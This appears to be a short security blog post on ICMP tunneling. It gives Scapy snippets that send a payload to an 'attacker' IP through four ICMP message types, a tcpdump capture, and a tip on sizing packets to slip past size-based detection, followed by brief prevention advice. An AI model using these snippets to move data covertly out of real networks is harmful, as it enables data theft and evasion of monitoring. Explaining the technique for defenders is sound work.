ICMP Tunneling
Updated: Jan 25, 2023
Introduction
Internet Control Message Protocol (ICMP) is a communication protocol used to diagnose and troubleshoot network issues. It is used to send messages between hosts and routers on an IP network. ICMP can also be used to tunnel data, which is a technique used to bypass firewalls and other security measures. ICMP tunneling is a form of data exfiltration that uses ICMP messages to send data from one host to another. This article will discuss the basics of ICMP tunneling, provide examples of ICMP tunneling using different types of ICMP messages, and provide recommendations to prevent ICMP tunneling.
What is ICMP Tunneling?
ICMP tunneling is a technique used to bypass firewall and other security measures. It uses ICMP messages to send data from one host to another. The data is encapsulated in the ICMP message, making it difficult for firewalls to detect and block. ICMP tunneling is often used to exfiltrate data from a network or to access a network that is otherwise inaccessible.
Types of ICMP Tunneling
ICMP tunneling can be done using different types of ICMP messages. These include:
• echo request (ping): This is the most common type of ICMP tunneling. It uses the echo request (ping) message to send data from one host to another. The data is encapsulated in the payload of the ICMP message.
• echo reply: This type of ICMP tunneling uses the echo reply message to send data from one host to another. The data is encapsulated in the payload of the ICMP message.
• Time exceeded: This type of ICMP tunneling uses the time exceeded message to send data from one host to another. The data is encapsulated in the payload of the ICMP message.
• Destination unreachable: This type of ICMP tunneling uses the destination unreachable message to send data from one host to another. The data is encapsulated in the payload of the ICMP message.
Examples of ICMP Tunneling Using Scapy
Scapy is a powerful Python-based network packet manipulation program. It can be used to create and send ICMP messages for ICMP tunneling. Here are some examples of ICMP tunneling using different types of ICMP messages with Scapy. For these examples the attacker machine's IP address is 192.168.1.1 and target machine's IP address is 192.168.1.2:
• Send Data to Attacker IP via Echo Request (Ping):
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=8, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)• Send Data to Attacker IP via Echo Reply:
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=0, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)• Send Data to Attacker IP via Time Exceeded:
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=11, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)• Send Data to Attacker IP via Destination Unreachable:
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=3, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)The attacker could capture the ICMP payload on the other side using tcpdump, scapy, etc:
$ sudo tcpdump -i eth0 -XX -n 'icmp and src 192.168.1.2'
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
16:39:15.130872 IP 192.168.1.2 > 192.168.1.1: ICMP echo request, id 0, seq 0, length 64
0x0000: f875 a4a3 fbce 3c97 0e01 853f 0800 4500 .u....<....?..E.
0x0010: 0054 0001 0000 4001 608b 0a03 0309 0a03 .T....@.`.......
0x0020: 030f 0000 cfe4 0000 0000 4141 4141 4141 ..........AAAAAA
0x0030: 4141 4242 4242 4242 4242 4343 4343 4343 AABBBBBBBBCCCCCC
0x0040: 4343 4444 4444 4444 4444 4545 4545 4545 CCDDDDDDDDEEEEEE
0x0050: 4545 4546 4646 4646 4646 4630 3030 3030 EEEFFFFFFFF00000
0x0060: 3030 00An interesting thing to note - the ICMP packet above contains 56 bytes of custom data / packet, which effectively makes it the same size as a default ICMP packet (i.e. which may allow for an attacker to circumvent monitoring used to detect ICMP tunneling / exfiltration):
$ sudo tcpdump -i eth0 -XX -n 'icmp and src 192.168.1.2'
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
16:39:15.130872 IP 192.168.1.2 > 192.168.1.1:ICMP echo request, id 26906, seq 1, length 64
0x0000: f875 a4a3 fbce 3c97 0e01 853f 0800 4500 .u....<....?..E.
0x0010: 0054 fa48 4000 4001 2643 0a03 0309 0a03 .T.H@.@.&C......
0x0020: 030f 0800 2b31 691a 0001 bc78 d163 0000 ....+1i....x.c..
0x0030: 0000 1204 0500 0000 0000 1011 1213 1415 ................
0x0040: 1617 1819 1a1b 1c1d 1e1f 2021 2223 2425 ...........!"#$%
0x0050: 2627 2829 2a2b 2c2d 2e2f 3031 3233 3435 &'()*+,-./012345
0x0060: 3637 67Prevent ICMP Tunneling
ICMP tunneling can be prevented by using a firewall to block ICMP messages. There are also some tools that can detect and block ICMP tunneling. These tools include packet sniffers, intrusion detection systems, and antivirus software. The default size of a single ICMP packet is typically 64 bytes, so any ICMP packet of a different size may warrant further investigation.
Conclusion
ICMP tunneling is a technique used to bypass firewalls and other security measures. It uses ICMP messages to send data from one host to another. This article discussed the basics of ICMP tunneling, provided examples of ICMP tunneling using different types of ICMP messages with Scapy, an example describing how to consume the data with tcpdump, and recommendations around ICMP tunneling prevention.
Commentaires